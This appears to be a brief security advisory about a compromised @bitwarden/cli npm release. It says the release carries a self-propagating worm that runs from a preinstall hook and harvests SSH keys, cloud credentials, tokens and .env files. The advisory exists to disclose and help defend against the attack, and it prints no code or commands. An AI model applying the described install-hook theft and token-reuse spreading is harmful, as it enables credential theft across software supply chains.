Is Shai-Hulud Back? Compromised Bitwarden CLI Contains a Self-Propagating npm Worm

Version 2026.4.0 of the @bitwarden/cli npm package (78,000 weekly downloads) has been identified as malicious. The attacker bypassed Bitwarden's trusted publishing controls by compromising the CI/CD pipeline (publish-ci.yml), allowing a malicious package under the legitimate @bitwarden namespace. The package installs a multi-stage worm called 'Shai-Hulud: The Third Coming' via a preinstall hook. It downloads the Bun runtime, then executes a 10 MB obfuscated payload that harvests SSH keys, AWS/GCP/Azure credentials, npm tokens, Claude Code auth tokens, MCP config files, .env files, shell history, and more. It also queries cloud secret stores using ambient credentials. Stolen data is exfiltrated to a public GitHub repo created under the victim's own account, and the worm self-propagates by reusing stolen GitHub tokens. Two C2 endpoints are identified, including a fake Checkmarx domain. IOCs including SHA256 hashes and commit message patterns are provided.